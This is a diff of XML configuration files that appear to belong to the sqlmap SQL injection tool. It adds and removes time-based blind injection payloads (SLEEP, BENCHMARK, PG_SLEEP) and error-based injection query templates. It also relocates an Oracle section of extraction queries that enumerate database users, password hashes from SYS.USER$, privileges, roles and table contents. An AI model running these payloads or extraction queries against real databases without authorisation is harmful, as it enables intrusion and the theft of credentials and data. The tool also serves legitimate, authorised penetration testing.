@@ -1181,6 +1194,7 @@ Formats:
         <risk>3</risk>
         <clause>1</clause>
         <where>1</where>
+        <epayload>OR IF((%s), [RANDNUM], SLEEP([SLEEPTIME]))</epayload>
         <request>
             <payload>OR SLEEP([SLEEPTIME])</payload>
         </request>
@@ -1200,6 +1214,7 @@ Formats:
         <risk>3</risk>
         <clause>1</clause>
         <where>1</where>
+        <epayload>OR IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</epayload>
         <request>
             <payload>OR BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
         </request>
@@ -1211,25 +1226,6 @@ Formats:
         </details>
     </test>
 
-    <test>
-        <title>PostgreSQL &gt; 8.1 OR time-based blind</title>
-        <stype>5</stype>
-        <level>2</level>
-        <risk>3</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <request>
-            <payload>OR PG_SLEEP([SLEEPTIME])</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-            <dbms_version>&gt; 8.1</dbms_version>
-        </details>
-    </test>
-
     <test>
         <title>SQLite &gt; 2.0 OR time-based blind</title>
         <stype>5</stype>
@@ -1237,6 +1233,7 @@ Formats:
         <risk>3</risk>
         <clause>1</clause>
         <where>1</where>
+        <epayload></epayload>
         <request>
             <payload>OR LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload>
         </request>
@@ -1257,6 +1254,7 @@ Formats:
         <risk>3</risk>
         <clause>1</clause>
         <where>1</where>
+        <epayload></epayload>
         <request>
             <payload>OR (COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload>
         </request>
@@ -1270,7 +1268,7 @@ Formats:
     </test>
     <!--
          NOTE: there is no way to perform this test against Microsoft SQL
-         Server, Sybase, Oracle or PostgreSQL < 8.2
+         Server, Sybase, Oracle or PostgreSQL
     -->
     <!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
     <!-- End of OR time-based blind tests -->
diff --git a/xml/queries.xml b/xml/queries.xml
index 20a92255a..25220a0ca 100644
--- a/xml/queries.xml
+++ b/xml/queries.xml
@@ -24,7 +24,6 @@
         <timedelay query="SELECT SLEEP(%d)" query2="SELECT BENCHMARK(5000000, MD5('%d'))"/>
         <substring query="MID((%s), %d, %d)"/>
         <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
-        <error query="%s (SELECT %s FROM(SELECT COUNT(*),CONCAT(%s,(%s),%s,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)"/>
         <inference query="AND ORD(MID((%s), %d, 1)) > %d"/>
         <banner query="VERSION()"/>
         <current_user query="CURRENT_USER()"/>
@@ -74,84 +73,6 @@
         </search_column>
     </dbms>
 
-    <!-- Oracle -->
-    <dbms value="Oracle">
-        <cast query="CAST(%s AS VARCHAR(4000))"/>
-        <length query="LENGTH(%s)"/>
-        <isnull query="NVL(%s, ' ')"/>
-        <delimiter query="||"/>
-        <limit query="ROWNUM AS LIMIT %s) WHERE LIMIT"/>
-        <limitregexp query="ROWNUM\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+|ROWNUM\s*=\s*[\d]+"/>
-        <limitgroupstart/>
-        <limitgroupstop/>
-        <limitstring/>
-        <order query="ORDER BY %s ASC"/>
-        <count query="COUNT(%s)"/>
-        <comment query="--"/>
-        <timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d.00)"/>
-        <substring query="SUBSTR((%s), %d, %d)"/>
-        <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/>
-        <error query="%s %s=(SELECT UPPER(XMLType(CHR(60)||%s||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||%s||CHR(62))) FROM DUAL)"/>
-        <inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
-        <banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
-        <current_user query="SELECT USER FROM DUAL"/>
-        <current_db query="SELECT SYS.DATABASE_NAME FROM DUAL"/>
-        <!--
-             NOTE: in Oracle to check if the session user is DBA you can use:
-             SELECT USERENV('ISDBA') FROM DUAL
-        -->
-        <is_dba query="(SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE GRANTEE=USER AND GRANTED_ROLE='DBA')='DBA'"/>
-        <users>
-            <inband query="SELECT USERNAME FROM SYS.ALL_USERS ORDER BY 1"/>
-            <blind query="SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS"/>
-        </users>
-        <passwords>
-            <inband query="SELECT NAME, PASSWORD FROM SYS.USER$" condition="NAME"/>
-            <blind query="SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$ WHERE NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$ WHERE NAME='%s'"/>
-        </passwords>
-        <!--
-             NOTE: in Oracle to enumerate the privileges for the session user you can use:
-             SELECT * FROM SESSION_PRIVS
-        -->
-        <privileges>
-            <inband query="SELECT GRANTEE, PRIVILEGE FROM DBA_SYS_PRIVS" query2="SELECT USERNAME, PRIVILEGE FROM USER_SYS_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
-            <blind query="SELECT DISTINCT(PRIVILEGE) FROM (SELECT DISTINCT(PRIVILEGE), ROWNUM AS LIMIT FROM DBA_SYS_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT DISTINCT(PRIVILEGE) FROM (SELECT DISTINCT(PRIVILEGE), ROWNUM AS LIMIT FROM USER_SYS_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(PRIVILEGE)) FROM DBA_SYS_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(DISTINCT(PRIVILEGE)) FROM USER_SYS_PRIVS WHERE USERNAME='%s'"/>
-        </privileges>
-        <!--
-             NOTE: in Oracle to enumerate the roles for the session user you can use:
-             SELECT * FROM SESSION_ROLES
-        -->
-        <roles>
-            <inband query="SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS" query2="SELECT USERNAME, GRANTED_ROLE FROM USER_ROLE_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
-            <blind query="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM USER_ROLE_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM USER_ROLE_PRIVS WHERE USERNAME='%s'"/>
-        </roles>
-        <!-- NOTE: in Oracle there is no query to enumerate DBMS databases. It is possible only through a STATUS request to the Oracle TNS Listener negotiating its protocol -->
-        <dbs/>
-        <tables>
-            <!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
-            <inband query="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES" condition="TABLESPACE_NAME"/>
-            <blind query="SELECT TABLE_NAME FROM (SELECT TABLE_NAME, ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'"/>
-        </tables>
-        <columns>
-            <inband query="SELECT COLUMN_NAME, DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
-            <blind query="SELECT COLUMN_NAME FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" query2="SELECT DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s'" count="SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
-        </columns>
-        <dump_table>
-            <inband query="SELECT %s FROM %s"/>
-            <blind query="SELECT %s FROM (SELECT %s, ROWNUM AS LIMIT FROM %s) WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
-        </dump_table>
-        <search_db/>
-        <search_table>
-            <!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
-            <inband query="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES WHERE " condition="TABLE_NAME" condition2="TABLESPACE_NAME"/>
-            <blind query="SELECT DISTINCT(TABLESPACE_NAME) FROM SYS.ALL_TABLES WHERE " query2="SELECT TABLE_NAME FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'" count="SELECT COUNT(DISTINCT(TABLESPACE_NAME)) FROM SYS.ALL_TABLES WHERE " count2="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'" condition="TABLE_NAME" condition2="TABLESPACE_NAME"/>
-        </search_table>
-        <search_column>
-            <inband query="SELECT TABLE_NAME FROM SYS.ALL_TAB_COLUMNS WHERE " condition="COLUMN_NAME"/>
-            <blind query="" query2="SELECT DISTINCT(TABLE_NAME) FROM SYS.ALL_TAB_COLUMNS" count="" count2="SELECT COUNT(DISTINCT(TABLE_NAME)) FROM SYS.ALL_TAB_COLUMNS" condition="COLUMN_NAME"/>
-        </search_column>
-    </dbms>
-
     <!-- PostgreSQL -->
     <dbms value="PostgreSQL">
         <cast query="CAST(%s AS CHARACTER(10000))"/>
@@ -175,7 +96,6 @@
         <timedelay query="SELECT PG_SLEEP(%d)" query2="SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 300000%d))" query3="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(%d)"/>
         <substring query="SUBSTR((%s)::text, %d, %d)"/>
         <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
-        <error query="%s %s=CAST(%s||(%s)::text||%s AS NUMERIC)"/>
         <inference query="AND ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/>
         <banner query="SELECT VERSION()"/>
         <current_user query="SELECT CURRENT_USER"/>
@@ -242,7 +162,6 @@
         <timedelay query="WAITFOR DELAY '0:0:%d'"/>
         <substring query="SUBSTRING((%s), %d, %d)"/>
         <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
-        <error query="%s %s=CONVERT(INT,(%s+(%s)+%s))"/>
         <inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
         <banner query="SELECT @@VERSION"/>
         <current_user query="SELECT SYSTEM_USER"/>
@@ -290,6 +209,83 @@
         </search_column>
     </dbms>
 
+    <!-- Oracle -->
+    <dbms value="Oracle">
+        <cast query="CAST(%s AS VARCHAR(4000))"/>
+        <length query="LENGTH(%s)"/>
+        <isnull query="NVL(%s, ' ')"/>
+        <delimiter query="||"/>
+        <limit query="ROWNUM AS LIMIT %s) WHERE LIMIT"/>
+        <limitregexp query="ROWNUM\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+|ROWNUM\s*=\s*[\d]+"/>
+        <limitgroupstart/>
+        <limitgroupstop/>
+        <limitstring/>
+        <order query="ORDER BY %s ASC"/>
+        <count query="COUNT(%s)"/>
+        <comment query="--"/>
+        <timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d.00)"/>
+        <substring query="SUBSTR((%s), %d, %d)"/>
+        <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/>
+        <inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
+        <banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
+        <current_user query="SELECT USER FROM DUAL"/>
+        <current_db query="SELECT SYS.DATABASE_NAME FROM DUAL"/>
+        <!--
+             NOTE: in Oracle to check if the session user is DBA you can use:
+             SELECT USERENV('ISDBA') FROM DUAL
+        -->
+        <is_dba query="(SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE GRANTEE=USER AND GRANTED_ROLE='DBA')='DBA'"/>
+        <users>
+            <inband query="SELECT USERNAME FROM SYS.ALL_USERS ORDER BY 1"/>
+            <blind query="SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS"/>
+        </users>
+        <passwords>
+            <inband query="SELECT NAME, PASSWORD FROM SYS.USER$" condition="NAME"/>
+            <blind query="SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$ WHERE NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$ WHERE NAME='%s'"/>
+        </passwords>
+        <!--
+             NOTE: in Oracle to enumerate the privileges for the session user you can use:
+             SELECT * FROM SESSION_PRIVS
+        -->
+        <privileges>
+            <inband query="SELECT GRANTEE, PRIVILEGE FROM DBA_SYS_PRIVS" query2="SELECT USERNAME, PRIVILEGE FROM USER_SYS_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
+            <blind query="SELECT DISTINCT(PRIVILEGE) FROM (SELECT DISTINCT(PRIVILEGE), ROWNUM AS LIMIT FROM DBA_SYS_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT DISTINCT(PRIVILEGE) FROM (SELECT DISTINCT(PRIVILEGE), ROWNUM AS LIMIT FROM USER_SYS_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(PRIVILEGE)) FROM DBA_SYS_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(DISTINCT(PRIVILEGE)) FROM USER_SYS_PRIVS WHERE USERNAME='%s'"/>
+        </privileges>
+        <!--
+             NOTE: in Oracle to enumerate the roles for the session user you can use:
+             SELECT * FROM SESSION_ROLES
+        -->
+        <roles>
+            <inband query="SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS" query2="SELECT USERNAME, GRANTED_ROLE FROM USER_ROLE_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
+            <blind query="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM USER_ROLE_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM USER_ROLE_PRIVS WHERE USERNAME='%s'"/>
+        </roles>
+        <!-- NOTE: in Oracle there is no query to enumerate DBMS databases. It is possible only through a STATUS request to the Oracle TNS Listener negotiating its protocol -->
+        <dbs/>
+        <tables>
+            <!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
+            <inband query="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES" condition="TABLESPACE_NAME"/>
+            <blind query="SELECT TABLE_NAME FROM (SELECT TABLE_NAME, ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'"/>
+        </tables>
+        <columns>
+            <inband query="SELECT COLUMN_NAME, DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
+            <blind query="SELECT COLUMN_NAME FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" query2="SELECT DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s'" count="SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
+        </columns>
+        <dump_table>
+            <inband query="SELECT %s FROM %s"/>
+            <blind query="SELECT %s FROM (SELECT %s, ROWNUM AS LIMIT FROM %s) WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
+        </dump_table>
+        <search_db/>
+        <search_table>
+            <!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
+            <inband query="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES WHERE " condition="TABLE_NAME" condition2="TABLESPACE_NAME"/>
+            <blind query="SELECT DISTINCT(TABLESPACE_NAME) FROM SYS.ALL_TABLES WHERE " query2="SELECT TABLE_NAME FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'" count="SELECT COUNT(DISTINCT(TABLESPACE_NAME)) FROM SYS.ALL_TABLES WHERE " count2="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'" condition="TABLE_NAME" condition2="TABLESPACE_NAME"/>
+        </search_table>
+        <search_column>
+            <inband query="SELECT TABLE_NAME FROM SYS.ALL_TAB_COLUMNS WHERE " condition="COLUMN_NAME"/>
+            <blind query="" query2="SELECT DISTINCT(TABLE_NAME) FROM SYS.ALL_TAB_COLUMNS" count="" count2="SELECT COUNT(DISTINCT(TABLE_NAME)) FROM SYS.ALL_TAB_COLUMNS" condition="COLUMN_NAME"/>
+        </search_column>
+    </dbms>
+
     <!-- SQLite -->
     <dbms value="SQLite">
         <!-- Not supported on SQLite 2 -->
@@ -477,7 +473,6 @@
         <timedelay query="WAITFOR DELAY '0:0:%d'"/>
         <substring query="SUBSTRING((%s), %d, %d)"/>
         <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
-        <error query="%s %s=CONVERT(INT,(%s+(%s)+%s))"/>
         <inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
         <banner query="SELECT @@VERSION"/>
         <current_user query="SELECT SUSER_NAME()"/>